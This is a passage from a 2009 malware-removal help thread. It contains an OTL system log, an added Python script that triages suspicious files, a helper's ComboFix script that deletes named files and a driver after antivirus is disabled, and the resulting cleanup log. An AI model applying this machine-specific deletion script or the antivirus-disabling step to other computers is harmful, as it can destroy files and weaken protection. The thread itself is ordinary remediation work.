O18 - Protocol\Handler\https\0x00000001 {E1D2BF42-A96B-11d1-9C6B-0000F875AC61} - C:\Program Files\Common Files\SYSTEM\Ole DB\msdaipp.dll (Microsoft Corporation)
O18 - Protocol\Handler\https\oledb {E1D2BF40-A96B-11d1-9C6B-0000F875AC61} - C:\Program Files\Common Files\SYSTEM\Ole DB\msdaipp.dll (Microsoft Corporation)
O18 - Protocol\Handler\ipp\0x00000001 {E1D2BF42-A96B-11d1-9C6B-0000F875AC61} - C:\Program Files\Common Files\SYSTEM\Ole DB\msdaipp.dll (Microsoft Corporation)
O18 - Protocol\Handler\livecall {828030A1-22C1-4009-854F-8E305202313F} - C:\Program Files\MSN Messenger\msgrapp.8.1.0178.00.dll (Microsoft Corporation)
O18 - Protocol\Handler\msdaipp\0x00000001 {E1D2BF42-A96B-11d1-9C6B-0000F875AC61} - C:\Program Files\Common Files\SYSTEM\Ole DB\msdaipp.dll (Microsoft Corporation)
O18 - Protocol\Handler\msdaipp\oledb {E1D2BF40-A96B-11d1-9C6B-0000F875AC61} - C:\Program Files\Common Files\SYSTEM\Ole DB\msdaipp.dll (Microsoft Corporation)
O18 - Protocol\Handler\ms-itss {0A9007C0-4076-11D3-8789-0000F8105754} - C:\Program Files\Common Files\Microsoft Shared\Information Retrieval\msitss.dll (Microsoft Corporation)
O18 - Protocol\Handler\msnim {828030A1-22C1-4009-854F-8E305202313F} - C:\Program Files\MSN Messenger\msgrapp.8.1.0178.00.dll (Microsoft Corporation)
O18 - Protocol\Filter: - text/xml - C:\Program Files\Common Files\Microsoft Shared\OFFICE11\MSOXMLMF.DLL (Microsoft Corporation)
O20 - HKLM Winlogon: Shell - (Explorer.exe) - C:\WINDOWS\Explorer.exe (Microsoft Corporation)
O20 - Winlogon\Notify\igfxcui: DllName - igfxdev.dll - C:\WINDOWS\system32\igfxdev.dll (Intel Corporation)
O32 - HKLM CDRom: AutoRun - 1
O34 - HKLM BootExecute: (autocheck) - File not found
O34 - HKLM BootExecute: (autochk) - C:\WINDOWS\System32\autochk.exe (Microsoft Corporation)
O34 - HKLM BootExecute: (*) - File not found

========== Files/Folders - Created Within 30 Days ==========

[2009/07/08 14:38:48 | 00,673,280 | ---- | C] () -- C:\WINDOWS\is-26UPH.exe
[2009/07/08 14:38:48 | 00,010,468 | ---- | C] () -- C:\WINDOWS\is-26UPH.msg
[2009/07/08 14:38:48 | 00,000,166 | ---- | C] () -- C:\WINDOWS\is-26UPH.lst
[2009/07/08 14:33:29 | 06,047,040 | ---- | C] (Glarysoft Ltd ) -- C:\Documents and Settings\John B\Desktop\gusetupnew.exe
[2009/06/26 14:33:25 | 00,000,886 | ---- | C] () -- C:\WINDOWS\tasks\GoogleUpdateTaskMachineUA.job
[2009/06/26 14:33:24 | 00,000,882 | ---- | C] () -- C:\WINDOWS\tasks\GoogleUpdateTaskMachineCore.job
[2009/06/25 14:01:43 | 00,005,398 | ---- | C] () -- C:\Documents and Settings\John B\My Documents\kasp.html
[2009/06/24 10:29:16 | 00,001,948 | -HS- | C] () -- C:\Documents and Settings\All Users\Documents\Thumbs.db
[2009/06/24 10:29:11 | 00,000,002 | ---- | C] () -- C:\-1124392173
[2009/06/17 13:49:44 | 00,024,064 | ---- | C] () -- C:\Documents and Settings\John B\My Documents\Nacey alling.doc
[2009/06/16 09:53:10 | 00,000,000 | ---D | C] -- C:\Documents and Settings\John B\My Documents\My Trackstick Files
[2009/06/16 09:49:52 | 00,002,339 | ---- | C] () -- C:\Documents and Settings\All Users\Desktop\Trackstick Manager.lnk
[2009/06/16 09:49:48 | 00,000,000 | ---D | C] -- C:\Program Files\Trackstick Manager
[2009/06/16 09:47:59 | 06,621,696 | ---- | C] (Microsoft Corporation) -- C:\Documents and Settings\John B\Desktop\TrackstickSetup.EXE
[2009/06/11 10:43:46 | 00,000,000 | ---D | C] -- C:\Documents and Settings\John B\Desktop\GooredFixBackups
[2009/06/11 09:48:35 | 00,101,636 | ---- | C] () -- C:\Documents and Settings\John B\Desktop\SystemLook.exe
[2009/01/14 21:23:11 | 00,065,536 | ---- | C] () -- C:\WINDOWS\System32\HPPLVS.dll
[2008/12/09 00:09:21 | 00,030,208 | ---- | C] () -- C:\WINDOWS\System32\WNASPI32.DLL
[2008/12/09 00:09:21 | 00,000,291 | ---- | C] () -- C:\WINDOWS\msfsetup.ini
[2008/12/09 00:04:55 | 00,003,654 | ---- | C] () -- C:\WINDOWS\System32\drivers\Sonyhcp.dll
[2007/11/06 15:19:28 | 00,053,299 | ---- | C] () -- C:\WINDOWS\System32\pthreadVC.dll
[2007/09/25 23:03:08 | 00,043,520 | ---- | C] () -- C:\WINDOWS\System32\CmdLineExt03.dll
[2007/07/26 13:01:50 | 00,114,688 | ---- | C] () -- C:\WINDOWS\System32\hppatusg01.dll
[2007/06/30 23:57:01 | 00,000,000 | ---- | C] () -- C:\WINDOWS\pestpatrol5.INI
[2007/06/18 00:34:35 | 00,011,776 | ---- | C] () -- C:\WINDOWS\System32\ZPORT4AS.dll
[2007/04/25 00:14:14 | 00,000,052 | ---- | C] () -- C:\WINDOWS\STYLEEASEAPA.INI
[2007/04/10 00:03:22 | 00,532,480 | ---- | C] () -- C:\WINDOWS\System32\CddbPlaylist2Sony.dll
[2007/03/05 13:34:28 | 00,676,224 | ---- | C] () -- C:\WINDOWS\System32\OGACheckControl.DLL
[2007/02/19 03:25:49 | 00,077,824 | R--- | C] () -- C:\WINDOWS\System32\HPZIDS01.dll
[2007/02/11 04:09:33 | 00,000,059 | ---- | C] () -- C:\WINDOWS\LTDLG13N.INI
[2006/12/05 17:21:09 | 00,000,000 | ---- | C] () -- C:\WINDOWS\Tripeaks.INI
[2006/11/02 17:03:38 | 00,002,042 | ---- | C] () -- C:\WINDOWS\tabled32.ini
[2006/10/31 12:06:03 | 00,000,128 | ---- | C] () -- C:\WINDOWS\wininit.ini
[2006/09/11 09:46:53 | 00,165,376 | ---- | C] () -- C:\WINDOWS\System32\drivers\atksgt.sys
[2006/09/11 09:46:52 | 00,018,048 | ---- | C] () -- C:\WINDOWS\System32\drivers\lirsgt.sys
[2005/09/04 22:53:16 | 00,000,022 | ---- | C] () -- C:\WINDOWS\kodakpcd.John B.ini
[2005/08/06 09:32:12 | 00,077,824 | ---- | C] () -- C:\WINDOWS\System32\MouseTrapLib.dll
[2005/06/10 10:57:39 | 00,000,034 | ---- | C] () -- C:\WINDOWS\hpfsched.ini
[2005/06/02 22:37:45 | 00,004,005 | ---- | C] () -- C:\WINDOWS\hpdj3740.ini
[2005/05/28 18:50:53 | 00,005,667 | ---- | C] () -- C:\WINDOWS\cdplayer.ini
[2005/03/01 15:30:20 | 00,000,453 | ---- | C] () -- C:\WINDOWS\bdoscandellang.ini
[2005/02/23 21:17:54 | 00,000,426 | ---- | C] () -- C:\WINDOWS\BRWMARK.INI
[2005/01/16 20:42:25 | 00,000,002 | ---- | C] () -- C:\WINDOWS\msoffice.ini
[2004/12/17 16:34:53 | 00,000,037 | ---- | C] () -- C:\WINDOWS\ipixActivex.ini
[2004/10/06 19:33:37 | 00,112,128 | RH-- | C] () -- C:\WINDOWS\CdaC14BA.DLL
[2004/10/06 19:33:35 | 00,008,864 | ---- | C] () -- C:\WINDOWS\System32\drivers\CDAC15BA.SYS
[2004/07/22 19:26:30 | 00,000,028 | ---- | C] () -- C:\WINDOWS\BTW.ini
[2004/07/22 19:26:22 | 00,000,000 | ---- | C] () -- C:\WINDOWS\autorun.INI
[2004/07/07 20:09:00 | 00,072,704 | ---- | C] () -- C:\WINDOWS\System32\GTRTST32.DLL
[2004/07/07 20:08:10 | 00,000,000 | ---- | C] () -- C:\WINDOWS\arhelper.INI
[2004/07/06 21:24:06 | 00,000,708 | ---- | C] () -- C:\WINDOWS\label.ini
[2004/07/06 21:23:54 | 00,000,052 | ---- | C] () -- C:\WINDOWS\odbcddp.ini
[2004/05/28 21:40:39 | 00,000,067 | ---- | C] () -- C:\WINDOWS\swupdate.INI
[2004/03/03 16:27:08 | 00,666,624 | ---- | C] ( ) -- C:\WINDOWS\System32\drivers\MA111nd5.sys
[2004/01/30 10:37:50 | 00,000,092 | R--- | C] () -- C:\WINDOWS\System32\FTDIUN2K.INI
[2003/11/21 16:49:44 | 00,000,061 | ---- | C] () -- C:\WINDOWS\smscfg.ini
[2003/11/20 20:49:20 | 00,000,908 | ---- | C] () -- C:\WINDOWS\System32\Px.ini
[2003/11/20 20:40:32 | 00,000,021 | ---- | C] () -- C:\WINDOWS\CS_SETUP.ini
[2003/11/20 20:34:03 | 00,000,906 | ---- | C] () -- C:\WINDOWS\QUICKEN.INI
[2003/11/20 20:32:41 | 00,019,607 | ---- | C] () -- C:\WINDOWS\System32\drivers\TOSSMBNT.sys
[2003/11/20 20:12:08 | 00,000,000 | ---- | C] () -- C:\WINDOWS\NDSTray.INI
[2003/11/20 20:06:36 | 00,000,034 | ---- | C] () -- C:\WINDOWS\wwwbatch.ini
[2003/11/20 19:54:31 | 00,128,113 | ---- | C] () -- C:\WINDOWS\System32\csellang.ini
[2003/11/20 19:54:31 | 00,045,056 | ---- | C] () -- C:\WINDOWS\System32\csellang.dll
[2003/11/20 19:54:31 | 00,010,165 | ---- | C] () -- C:\WINDOWS\System32\tosmreg.ini
[2003/11/20 19:54:31 | 00,007,671 | ---- | C] () -- C:\WINDOWS\System32\cseltbl.ini
[2003/11/20 19:53:21 | 00,016,384 | ---- | C] () -- C:\WINDOWS\System32\e100bmsg.dll
[2003/11/20 19:44:16 | 00,363,520 | ---- | C] () -- C:\WINDOWS\System32\psisdecd.dll
[2003/11/20 19:28:40 | 00,006,867 | ---- | C] () -- C:\WINDOWS\System32\drivers\tbiosdrv.sys
[2003/11/20 18:53:50 | 00,001,924 | ---- | C] () -- C:\WINDOWS\ODBC.INI
[2003/11/20 18:50:00 | 00,000,780 | ---- | C] () -- C:\WINDOWS\orun32.ini
[2003/11/20 18:42:22 | 00,001,793 | ---- | C] () -- C:\WINDOWS\System32\fxsperf.ini
[2003/11/20 17:12:52 | 00,000,382 | ---- | C] () -- C:\WINDOWS\System32\OEMINFO.INI
[2003/11/20 17:12:23 | 00,000,742 | ---- | C] () -- C:\WINDOWS\win.ini
[2003/11/20 17:12:16 | 00,000,227 | ---- | C] () -- C:\WINDOWS\system.ini
[2002/04/04 15:04:08 | 00,069,632 | ---- | C] () -- C:\WINDOWS\System32\hpodinet.dll
[2001/07/07 04:00:00 | 00,003,399 | ---- | C] () -- C:\WINDOWS\System32\hptcpmon.ini
[1996/04/03 14:33:26 | 00,005,248 | ---- | C] () -- C:\WINDOWS\System32\giveio.sys

========== Files - Modified Within 30 Days ==========

[2009/07/09 10:38:28 | 00,000,886 | ---- | M] () -- C:\WINDOWS\tasks\GoogleUpdateTaskMachineUA.job
[2009/07/08 17:08:16 | 00,000,284 | ---- | M] () -- C:\WINDOWS\tasks\AppleSoftwareUpdate.job
[2009/07/08 15:10:08 | 00,054,156 | -H-- | M] () -- C:\WINDOWS\QTFont.qfn
[2009/07/08 14:39:10 | 00,000,314 | ---- | M] () -- C:\WINDOWS\tasks\GlaryInitialize.job
[2009/07/08 14:38:48 | 00,673,280 | ---- | M] () -- C:\WINDOWS\is-26UPH.exe
[2009/07/08 14:38:48 | 00,010,468 | ---- | M] () -- C:\WINDOWS\is-26UPH.msg
[2009/07/08 14:38:48 | 00,000,675 | ---- | M] () -- C:\Documents and Settings\John B\Desktop\Glary Utilities.lnk
[2009/07/08 14:38:48 | 00,000,166 | ---- | M] () -- C:\WINDOWS\is-26UPH.lst
[2009/07/08 14:38:04 | 00,000,882 | ---- | M] () -- C:\WINDOWS\tasks\GoogleUpdateTaskMachineCore.job
[2009/07/08 14:34:17 | 06,047,040 | ---- | M] (Glarysoft Ltd ) -- C:\Documents and Settings\John B\Desktop\gusetupnew.exe
[2009/07/08 13:19:20 | 00,000,006 | -H-- | M] () -- C:\WINDOWS\tasks\SA.DAT
[2009/07/08 13:18:05 | 00,000,062 | -HS- | M] () -- C:\Documents and Settings\NetworkService\Local Settings\desktop.ini
[2009/07/08 13:17:54 | 00,002,048 | --S- | M] () -- C:\WINDOWS\bootstat.dat
[2009/07/08 13:17:46 | 78,733,7216 | -HS- | M] () -- C:\hiberfil.sys
[2009/07/07 09:15:56 | 00,001,158 | ---- | M] () -- C:\WINDOWS\System32\wpa.dbl
[2009/06/25 15:42:46 | 00,002,339 | ---- | M] () -- C:\Documents and Settings\All Users\Desktop\Trackstick Manager.lnk
[2009/06/25 14:01:43 | 00,005,398 | ---- | M] () -- C:\Documents and Settings\John B\My Documents\kasp.html
[2009/06/24 10:29:19 | 00,001,948 | -HS- | M] () -- C:\Documents and Settings\All Users\Documents\Thumbs.db
[2009/06/24 10:29:18 | 00,000,002 | ---- | M] () -- C:\-1124392173
[2009/06/17 13:49:44 | 00,024,064 | ---- | M] () -- C:\Documents and Settings\John B\My Documents\Nacey alling.doc
[2009/06/17 13:30:25 | 00,024,576 | ---- | M] () -- C:\Documents and Settings\John B\My Documents\alice grant.doc
[2009/06/17 11:27:56 | 00,038,160 | ---- | M] (Malwarebytes Corporation) -- C:\WINDOWS\System32\drivers\mbamswissarmy.sys
[2009/06/17 11:27:44 | 00,019,096 | ---- | M] (Malwarebytes Corporation) -- C:\WINDOWS\System32\drivers\mbam.sys
[2009/06/16 09:49:15 | 06,621,696 | ---- | M] (Microsoft Corporation) -- C:\Documents and Settings\John B\Desktop\TrackstickSetup.EXE
[2009/06/11 12:53:18 | 00,247,904 | ---- | M] () -- C:\WINDOWS\System32\FNTCACHE.DAT
[2009/06/11 12:05:32 | 00,001,374 | ---- | M] () -- C:\WINDOWS\imsins.BAK
[2009/06/11 09:48:35 | 00,101,636 | ---- | M] () -- C:\Documents and Settings\John B\Desktop\SystemLook.exe
< End of report >


Thank you for getting back to me.
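The helpers in this thread read OTL's "Files - Modified Within 30 Days" listing by eye; that is how `C:\WINDOWS\is-26UPH.exe` and `C:\-1124392173` end up in the CFScript in the next post. As an added example that is not part of the thread, here is a small Python parser for that line format (timestamp, size, attribute flags, C/M, the publisher OTL takes from the file's version information, path) with two triage rules: an executable with no publisher sitting directly in a directory Windows loads code from, and an unexpected file in the root of the system drive. The loader-directory and known-root-file lists are my assumptions; the sample lines are copied from the log above.

```python
import re
from dataclasses import dataclass
from datetime import datetime
from pathlib import PureWindowsPath

# Sample input: lines copied from the OTL "Files - Modified Within 30 Days"
# section posted above, including the entry whose size field is garbled.
SAMPLE_LOG = r"""
[2009/07/08 15:10:08 | 00,054,156 | -H-- | M] () -- C:\WINDOWS\QTFont.qfn
[2009/07/08 14:38:48 | 00,673,280 | ---- | M] () -- C:\WINDOWS\is-26UPH.exe
[2009/07/08 14:38:48 | 00,010,468 | ---- | M] () -- C:\WINDOWS\is-26UPH.msg
[2009/07/08 14:34:17 | 06,047,040 | ---- | M] (Glarysoft Ltd ) -- C:\Documents and Settings\John B\Desktop\gusetupnew.exe
[2009/07/08 13:17:46 | 78,733,7216 | -HS- | M] () -- C:\hiberfil.sys
[2009/06/24 10:29:18 | 00,000,002 | ---- | M] () -- C:\-1124392173
[2009/06/17 11:27:56 | 00,038,160 | ---- | M] (Malwarebytes Corporation) -- C:\WINDOWS\System32\drivers\mbamswissarmy.sys
[2009/06/11 09:48:35 | 00,101,636 | ---- | M] () -- C:\Documents and Settings\John B\Desktop\SystemLook.exe
< End of report >
"""

# One entry: [timestamp | size | attributes | C(reated)/M(odified)] (company) -- path
LINE_RE = re.compile(
    r"^\[(?P<ts>\d{4}/\d{2}/\d{2} \d{2}:\d{2}:\d{2}) \| (?P<size>[\d,]+) \| "
    r"(?P<attrs>[-A-Z]{4}) \| (?P<kind>[CM])\] \((?P<company>[^)]*)\) -- (?P<path>.+)$"
)

EXEC_EXT = {".exe", ".dll", ".sys", ".scr", ".com", ".pif", ".bat", ".cmd", ".vbs"}
# Assumption: directories Windows searches when an autostart entry names a bare
# file, so an unattributed executable dropped here deserves a look.
LOADER_DIRS = {"c:\\windows", "c:\\windows\\system32", "c:\\windows\\system32\\drivers"}
# Assumption: files that legitimately sit in the root of an XP system drive.
KNOWN_ROOT_FILES = {"hiberfil.sys", "pagefile.sys", "boot.ini", "ntldr", "ntdetect.com",
                    "autoexec.bat", "config.sys", "io.sys", "msdos.sys"}


@dataclass
class Entry:
    stamp: datetime
    size: int
    attrs: str     # e.g. "-HS-": hidden + system
    kind: str      # "C" created, "M" modified
    company: str   # publisher OTL read from the file's version information
    path: PureWindowsPath


def parse_otl(text):
    """Turn the OTL file listing into Entry records, skipping headers and the trailer."""
    entries = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m is None:
            continue
        entries.append(Entry(
            stamp=datetime.strptime(m["ts"], "%Y/%m/%d %H:%M:%S"),
            size=int(m["size"].replace(",", "")),
            attrs=m["attrs"],
            kind=m["kind"],
            company=m["company"].strip(),
            path=PureWindowsPath(m["path"]),
        ))
    return entries


def triage(entries):
    """Return (path, reason) pairs for entries worth checking, newest first."""
    findings = []
    for e in sorted(entries, key=lambda x: x.stamp, reverse=True):
        parent = str(e.path.parent).lower()
        if e.path.suffix.lower() in EXEC_EXT and parent in LOADER_DIRS and not e.company:
            findings.append((str(e.path), "executable with no publisher in a Windows loader directory"))
        elif e.path.parent == PureWindowsPath("C:\\") and e.path.name.lower() not in KNOWN_ROOT_FILES:
            findings.append((str(e.path), "unexpected file in the root of the system drive"))
    return findings


if __name__ == "__main__":
    for path, reason in triage(parse_otl(SAMPLE_LOG)):
        print(f"{path}: {reason}")
```

Run against the lines above it reports exactly the two files the helper later scripted for removal and stays quiet about the Malwarebytes driver (it carries a publisher) and hiberfil.sys (a known root file). The publisher field is only version-information text, not an Authenticode check, so a missing company is a reason to look, not a verdict.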



#41 Transience (Unofficial Music Guru, Retired Staff, 2,448 posts)
Hello Aoc, sorry for the delay. I will be taking Egwene's place for the remainder of the fix; he has a lot going on just now.

I see you've run ComboFix before; please delete all copies on your PC at the moment and download a fresh copy from here. Then proceed with these instructions:

1. Run a ComboFix script
  • Copy the entire contents of the code box below to notepad (Start > Programs > Accessories > Notepad).
  • Click on File > Save and name the file CFScript.txt. This name is important and must not be changed.
  • Change the Save as Type to All Files.
  • Save it directly on your desktop.
KillAll::

File::
C:\Documents and Settings\John B\desktop\porthard\workcomputer\docs\Downloads\Programs\Sparkle_dwn.exe
C:\Documents and Settings\John B\DoctorWeb\Quarantine\Abel.exe
C:\Documents and Settings\John B\My Documents\My Completed Downloads\ca_setup.exe
C:\poykfa.exe
C:\WINDOWS\System32\drivers\TOSSMBNT.sys
C:\WINDOWS\is-26UPH.exe
C:\WINDOWS\is-26UPH.msg
C:\WINDOWS\is-26UPH.lst

Folder::
C:\-1124392173

Driver::
TOSSMBNT

Extra::

SysRst::
Note: If you are not the topic starter, DO NOT download or run this script as it could cause irreversible damage to your computer.

Please note that the same procedure applies to running ComboFix this time as before - disable your protection programs beforehand, close all other programs, don't interrupt it for any reason etc.

(image: CFScript.txt being dragged onto ComboFix.exe)

Once the script is saved, referring to the picture above, drag CFScript.txt into ComboFix.exe. This will cause ComboFix to start again. Allow it to complete running, following any prompts. Once the program has completed, the log should appear automatically; if it doesn't, it can be found at C:\ComboFix.txt. Please post the contents of that log in your next reply.

Cheers,
Dave

#42 Aoc (Member, Topic Starter, 36 posts)
Thanks for getting back to me; here is the log you asked for.


ComboFix 09-07-19.04 - John B 07/20/2009 9:37.7.1 - NTFSx86
Microsoft Windows XP Home Edition 5.1.2600.3.1252.1.1033.18.751.436 [GMT -5:00]
Running from: c:\documents and settings\John B\Desktop\Combo-Fix.exe
Command switches used :: c:\documents and settings\John B\Desktop\CFScript.txt
AV: avast! antivirus 4.8.1335 [VPS 090719-1] *On-access scanning disabled* (Updated) {7591DB91-41F0-48A3-B128-1A293FD8233D}
* Created a new restore point

FILE ::
"c:\documents and settings\John B\desktop\porthard\workcomputer\docs\Downloads\Programs\Sparkle_dwn.exe"
"c:\documents and settings\John B\DoctorWeb\Quarantine\Abel.exe"
"c:\documents and settings\John B\My Documents\My Completed Downloads\ca_setup.exe"
"C:\poykfa.exe"
"c:\windows\is-26UPH.exe"
"c:\windows\is-26UPH.lst"
"c:\windows\is-26UPH.msg"
"c:\windows\System32\drivers\TOSSMBNT.sys"
.

((((((((((((((((((((((((((((((((((((((( Other Deletions )))))))))))))))))))))))))))))))))))))))))))))))))
.

C:\-1124392173
c:\documents and settings\John B\desktop\porthard\workcomputer\docs\Downloads\Programs\Sparkle_dwn.exe
c:\documents and settings\John B\Local Settings\Temporary Internet Files\temp.dmf
c:\documents and settings\John B\My Documents\My Completed Downloads\ca_setup.exe
c:\windows\Downloaded Program Files\popcaploader.inf
c:\windows\Installer\26ed31d.msi
c:\windows\Installer\4462d.msi
c:\windows\Installer\596ea64.msi
c:\windows\system32\drivers\TOSSMBNT.sys

c:\windows\system32\proquota.exe was missing
Restored copy from - c:\system volume information\_restore{5808F9B6-96B5-4803-A039-47EB1E010CB7}\RP386\A0066304.exe

.
((((((((((((((((((((((((((((((((((((((( Drivers/Services )))))))))))))))))))))))))))))))))))))))))))))))))
.

-------\Legacy_TOSSMBNT
-------\Legacy_{79007602-0CDB-4405-9DBF-1257BB3226ED}
-------\Legacy_{79007602-0CDB-4405-9DBF-1257BB3226EE}
-------\Service_tossmbnt


((((((((((((((((((((((((( Files Created from 2009-06-20 to 2009-07-20 )))))))))))))))))))))))))))))))
.

2009-07-20 14:46 . 2008-04-14 00:12 50176 -c--a-w- c:\windows\system32\dllcache\proquota.exe
2009-07-20 14:46 . 2008-04-14 00:12 50176 ----a-w- c:\windows\system32\proquota.exe
2009-06-24 20:59 . 2009-06-24 20:58 410984 ----a-w- c:\windows\system32\deploytk.dll
2009-06-24 20:58 . 2009-06-24 20:58 152576 ----a-w- c:\documents and settings\John B\Application Data\Sun\Java\jre1.6.0_14\lzma.dll

.
(((((((((((((((((((((((((((((((((((((((( Find3M Report ))))))))))))))))))))))))))))))))))))))))))))))))))))
.
2009-07-20 14:49 . 2008-11-17 19:50 -------- d-----w- c:\program files\Glary Utilities
2009-07-14 20:25 . 2005-05-26 03:10 -------- d-----w- c:\program files\Mozilla Thunderbird
2009-06-24 20:58 . 2003-11-21 00:41 -------- d-----w- c:\program files\Java
2009-06-24 14:04 . 2009-01-17 02:19 -------- d-----w- c:\program files\Malwarebytes' Anti-Malware
2009-06-23 20:55 . 2009-02-27 14:22 3561743 ----a-w- c:\documents and settings\All Users\Application Data\Malwarebytes\Malwarebytes' Anti-Malware\mbam-setup.exe
2009-06-19 20:25 . 2005-05-20 16:26 -------- d-----w- c:\program files\PokerStars
2009-06-17 18:32 . 2007-12-30 17:33 -------- d-----w- c:\program files\SpeedFan
2009-06-17 16:27 . 2009-01-17 02:19 38160 ----a-w- c:\windows\system32\drivers\mbamswissarmy.sys
2009-06-17 16:27 . 2009-01-17 02:19 19096 ----a-w- c:\windows\system32\drivers\mbam.sys
2009-06-16 14:49 . 2009-06-16 14:49 -------- d-----w- c:\program files\Trackstick Manager
2009-06-16 14:36 . 2003-11-20 22:12 119808 ----a-w- c:\windows\system32\t2embed.dll
2009-06-16 14:36 . 2003-11-20 22:11 81920 ----a-w- c:\windows\system32\fontsub.dll
2009-06-05 15:05 . 2009-06-05 15:05 5178656 ----a-w- c:\documents and settings\John B\Application Data\GARMIN\RMU\RmuSetup.exe
2009-06-05 15:05 . 2009-06-05 15:05 -------- d-----w- c:\documents and settings\John B\Application Data\GARMIN
2009-06-05 14:57 . 2007-11-26 01:25 -------- d-----w- c:\program files\DIFX
2009-06-05 14:57 . 2009-06-05 14:57 -------- d-----w- c:\program files\Garmin
2009-06-04 19:21 . 2006-01-13 03:23 10 ----a-w- c:\windows\popcinfo.dat
2009-06-04 18:57 . 2006-06-17 03:07 -------- d-----w- c:\program files\Railroad Tycoon II
2009-06-03 20:03 . 2007-05-16 02:19 -------- d---a-w- c:\documents and settings\All Users\Application Data\TEMP
2009-06-03 19:56 . 2008-05-22 06:55 -------- d-----w- c:\documents and settings\All Users\Application Data\HipSoft
2009-06-03 19:09 . 2003-05-30 17:00 1291264 ----a-w- c:\windows\system32\quartz.dll
2009-05-26 18:04 . 2008-10-30 05:07 -------- d-----w- c:\program files\Cain
2009-05-19 18:09 . 2009-05-19 18:09 1245321 ----a-w- c:\documents and settings\All Users\Application Data\NeoEdge Networks\Yahoo_Buildalot\IAF.dll
2009-05-07 15:32 . 2003-11-20 22:11 345600 ----a-w- c:\windows\system32\localspl.dll
2009-04-29 04:46 . 2004-02-06 23:05 666624 ----a-w- c:\windows\system32\wininet.dll
2009-04-29 04:46 . 2004-09-09 00:06 81920 ------w- c:\windows\system32\ieencode.dll
2004-12-22 22:58 . 2004-12-29 01:41 18448384 ----a-w- c:\program files\Common Files\TaxWise Workstation Setup.msi
2009-06-16 14:03 . 2009-01-10 20:56 134648 ----a-w- c:\program files\mozilla firefox\components\brwsrcmp.dll
.

((((((((((((((((((((((((((((((((((((((( System Restore )))))))))))))))))))))))))))))))))))))))))))))))))))
.

c:\32788r22fwjfw.0.tmp\n.com
04/20/2009 12:56 PM 31232 \RP386\A0065955.com

c:\32788r22fwjfw.0.tmp\ND_.bat
05/01/2009 02:44 AM 5945 \RP386\A0065956.bat

c:\32788r22fwjfw.0.tmp\NT-OS.cmd
05/17/2009 03:27 AM 11910 \RP386\A0065957.cmd

c:\32788r22fwjfw.0.tmp\OSid.vbs
08/31/2000 08:00 AM 977 \RP386\A0065958.vbs

c:\32788r22fwjfw.0.tmp\pev.exe
05/14/2009 05:50 PM 117248 \RP386\A0065959.exe

c:\32788r22fwjfw.0.tmp\Prep.cmd
05/18/2009 01:20 PM 12353 \RP386\A0065960.cmd

c:\32788r22fwjfw.0.tmp\RegScan.cmd
05/17/2009 03:28 AM 50388 \RP386\A0065962.cmd

c:\32788r22fwjfw.0.tmp\restore_pt.vbs
05/01/2009 10:26 PM 587 \RP386\A0065963.vbs

c:\32788r22fwjfw.0.tmp\RestoreO4.bat
04/24/2009 11:07 PM 1773 \RP386\A0065964.bat

c:\32788r22fwjfw.0.tmp\Rkey.cmd
08/31/2000 08:00 AM 241 \RP386\A0065965.cmd

c:\32788r22fwjfw.0.tmp\SafeBootRepair.bat
05/17/2009 03:28 AM 15359 \RP386\A0065966.bat

c:\32788r22fwjfw.0.tmp\SetEnvmt.bat
05/17/2009 03:28 AM 12650 \RP386\A0065967.bat

c:\32788r22fwjfw.0.tmp\SnapShot.cmd
05/17/2009 03:28 AM 3347 \RP386\A0065968.cmd

c:\32788r22fwjfw.0.tmp\SRestore.cmd
05/17/2009 03:28 AM 2142 \RP386\A0065969.cmd

c:\32788r22fwjfw.0.tmp\SuppScan.cmd
05/17/2009 03:28 AM 17714 \RP386\A0065970.cmd

c:\32788r22fwjfw.0.tmp\SvcDrv.vbs
08/31/2000 08:00 AM 2176 \RP386\A0065971.vbs

c:\32788r22fwjfw.0.tmp\Update-CF.cmd
04/24/2009 11:07 PM 2743 \RP386\A0065973.cmd

c:\32788r22fwjfw.0.tmp\Wmi_rem.vbs
05/14/2009 01:08 AM 592 \RP386\A0065974.vbs

c:\avenger\gsf83iujid.dll
\RP403\A0066778.dll

C:\CFCleanUp.bat
\RP382\A0065673.bat

C:\chfyosn.exe
\RP403\A0066754.exe

05/17/2009 03:28 AM 3286 c:\combo-fix\Assoc.cmd
05/17/2009 03:28 AM 3286 \RP413\A0079041.cmd

c:\combo-fix\Auto-RC.cmd
05/17/2009 03:28 AM 3108 \RP413\A0079042.cmd

07/14/2009 03:16 PM 1239 c:\combo-fix\av.cmd
07/14/2009 03:16 PM 1239 \RP413\A0079043.cmd

05/13/2009 06:09 PM 1464 c:\combo-fix\av.vbs
05/13/2009 06:09 PM 1464 \RP413\A0079044.vbs

c:\combo-fix\AWF.cmd
04/29/2009 04:41 PM 629 \RP413\A0079045.cmd

06/14/2009 02:08 AM 1896 c:\combo-fix\Boot-Rk.cmd
06/14/2009 02:08 AM 1896 \RP413\A0079046.cmd

07/19/2009 07:20 AM 7692 c:\combo-fix\Boot.bat
07/19/2009 07:20 AM 7692 \RP413\A0079047.bat

08/31/2000 08:00 AM 7680 c:\combo-fix\BootSect.dll
08/31/2000 08:00 AM 7680 \RP413\A0079048.dll

c:\combo-fix\c.bat
07/20/2009 09:11 AM 45236 \RP413\A0079049.bat

06/06/2009 08:51 AM 732 c:\combo-fix\Catch-sub.cmd
06/06/2009 08:51 AM 732 \RP413\A0079050.cmd

07/20/2009 09:50 AM 91 c:\combo-fix\CCS.bat
07/20/2009 09:37 AM 91 \RP414\A0079149.bat

c:\combo-fix\CF-Script.cmd
07/15/2009 07:34 AM 25506 \RP413\A0079051.cmd

07/20/2009 09:34 AM 16 c:\combo-fix\CHCP.bat
07/20/2009 09:32 AM 16 \RP413\A0079052.bat

08/31/2000 08:00 AM 1024 \RP413\A0079053.sys

c:\combo-fix\Combobatch.bat
07/20/2009 02:58 AM 7521 \RP413\A0079054.bat

c:\combo-fix\Create.cmd
07/02/2009 05:34 PM 6692 \RP413\A0079055.cmd

07/13/2009 01:13 AM 3412 c:\combo-fix\CregC.cmd
07/13/2009 01:13 AM 3412 \RP413\A0079056.cmd

05/25/2009 10:08 AM 1688 c:\combo-fix\CSet.cmd
05/25/2009 10:08 AM 1688 \RP413\A0079057.cmd

07/08/2009 07:32 PM 1406 c:\combo-fix\DelClsid.bat
07/08/2009 07:32 PM 1406 \RP413\A0079058.bat

07/16/2009 10:08 AM 13502 c:\combo-fix\Exe.reg
07/16/2009 10:08 AM 13502 \RP413\A0079059.reg

c:\combo-fix\FD-SV.cmd
07/19/2009 11:29 AM 2162 \RP413\A0079060.cmd

